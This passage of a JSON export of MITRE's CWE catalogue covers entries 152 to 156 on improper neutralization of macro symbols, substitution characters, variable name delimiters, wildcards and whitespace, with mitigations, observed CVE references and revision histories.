Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Comment Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Comment Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Comment Element","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Comment Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"152":{"attr":{"@_ID":"152","@_Name":"Improper Neutralization of Macro Symbols","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as macro symbols when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Developers should anticipate that macro symbols will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"},{"Reference":"CVE-2008-2018","Description":"Attacker can obtain sensitive information from a database by using a comment containing a macro, which inserts the data during expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2018"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Macro Symbol"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Macro Symbol","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Macro Symbol","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Macro Symbol","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Macro Symbols","attr":{"@_Date":"2010-04-05"}}]}},"153":{"attr":{"@_ID":"153","@_Name":"Improper Neutralization of Substitution Characters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as substitution characters when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that substitution characters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Substitution Character"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Substitution Character","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Substitution Character","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Substitution Character","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Substitution Characters","attr":{"@_Date":"2010-04-05"}}]}},"154":{"attr":{"@_ID":"154","@_Name":"Improper Neutralization of Variable Name Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as variable name delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected delimiter may cause the process to take unexpected actions that result in an attack. Example: \\"$\\" for an environment variable.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that variable name delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0129","Description":"\\"%\\" variable is expanded by wildcard function into disallowed commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0129"},{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Variable Name Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Variable Name Delimiter","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Variable Name Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Variable Name Delimiter","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Variable Name Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"155":{"attr":{"@_ID":"155","@_Name":"Improper Neutralization of Wildcards or Matching Symbols","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as wildcards or matching symbols when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected element may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that wildcard or matching elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Bypass file restrictions using wildcard character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2002-1010","Description":"Bypass file restrictions using wildcard character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1010"},{"Reference":"CVE-2001-0334","Description":"Wildcards generate long string on expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334"},{"Reference":"CVE-2004-1962","Description":"SQL injection involving \\"/**/\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1962"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wildcard or Matching Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Wildcard or Matching Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Wildcard or Matching Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Wildcard or Matching Symbol","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Wildcards or Matching Symbols","attr":{"@_Date":"2010-04-05"}}]}},"156":{"attr":{"@_ID":"156","@_Name":"Improper Neutralization of Whitespace","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as whitespace when they are sent to a downstream component.","Extended_Description":"This can include space, tab, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"White space"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that whitespace will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0637","Description":"MIE. virus protection bypass with RFC violations involving extra whitespace, or missing whitespace.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637"},{"Reference":"CVE-2004-0942","Description":"CPU consumption with MIME headers containing lines with many space characters, probably due to algorithmic complexity (RESOURCE.AMP.ALG).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0942"},{"Reference":"CVE-2003-1015","Description":"MIE. whitespace interpreted differently by mail clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1015"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"SPEC.WHITESPACE","Entry_Name":"Whitespace"},{"attr":{"@_Taxonomy_Name":"Software Fault 